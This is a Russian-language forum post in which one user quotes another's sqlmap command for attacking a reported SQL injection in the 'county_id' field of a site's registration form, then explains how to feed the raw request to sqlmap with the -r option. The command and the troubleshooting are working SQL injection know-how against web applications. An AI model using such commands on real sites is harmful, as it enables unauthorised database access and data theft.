Показать сообщение отдельно

  #960  
Старый 09.11.2019, 10:58
winstrool
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875

Репутация: 137
По умолчанию

Цитата:
Сообщение от vladF  

Сканер нашел уязвимость,но я с таким столкнулся впервые
Код:
-u "https://site.com/user_save.php" -p "county_id" --risk="3" --method="POST" --data="--31ed9d031d5848e3a524ba24f417a44b
Content-Disposition: form-data; name=%22forename%22

Smith
--31ed9d031d5848e3a524ba24f417a44b
Content-Disposition: form-data; name=%22surname%22

Smith
--31ed9d031d5848e3a524ba24f417a44b
Content-Disposition: form-data; name=%22email%22

netsparker@example.com
--31ed9d031d5848e3a524ba24f417a44b
Content-Disposition: form-data; name=%22new_pass%22

N3tsp@rker-
--31ed9d031d5848e3a524ba24f417a44b
Content-Disposition: form-data; name=%22retype_pass%22

N3tsp@rker-
--31ed9d031d5848e3a524ba24f417a44b
Content-Disposition: form-data; name=%22county_id%22

test
--31ed9d031d5848e3a524ba24f417a44b
Content-Disposition: form-data; name=%22town_id%22

893
--31ed9d031d5848e3a524ba24f417a44b
Content-Disposition: form-data; name=%22phone%22

3
--31ed9d031d5848e3a524ba24f417a44b
Content-Disposition: form-data; name=%22mobile%22

3
--31ed9d031d5848e3a524ba24f417a44b
Content-Disposition: form-data; name=%22terms_conditions%22

on
--31ed9d031d5848e3a524ba24f417a44b
Content-Disposition: form-data; name=%22subscribe_emails%22

on
--31ed9d031d5848e3a524ba24f417a44b
Content-Disposition: form-data; name=%22g-recaptcha-response%22

10000000146
--31ed9d031d5848e3a524ba24f417a44b
Content-Disposition: form-data; name=%22submit%22

Create Account
--31ed9d031d5848e3a524ba24f417a44b--
" --user-agent="Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.16 Safari/537.36" --cookie="PHPSESSID=vorccgbo8prl78srfaqavg0map" --headers="Host:www.site.com\nCache-Control:no-cache\nReferer:https://site.com/user_save.php\nAccept:text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\nAccept-Language:en-us,en;q=0.5\nX-Scanner:Netsparker\nAccept-Encoding:gzip, deflate\nContent-Type:multipart/form-data; boundary=31ed9d031d5848e3a524ba24f417a44b" --dbms="MySQL"
Пробую через sqlmap - получаю такую ошибку:
[CRITICAL] all testable parameters you provided are not present within the given request data
Как правильно скормить в sqlmap?
Правильно сложите весь пакет запроса в файл и подключите его через параметр: sqlmap.py -r file.txt
 
Ответить с цитированием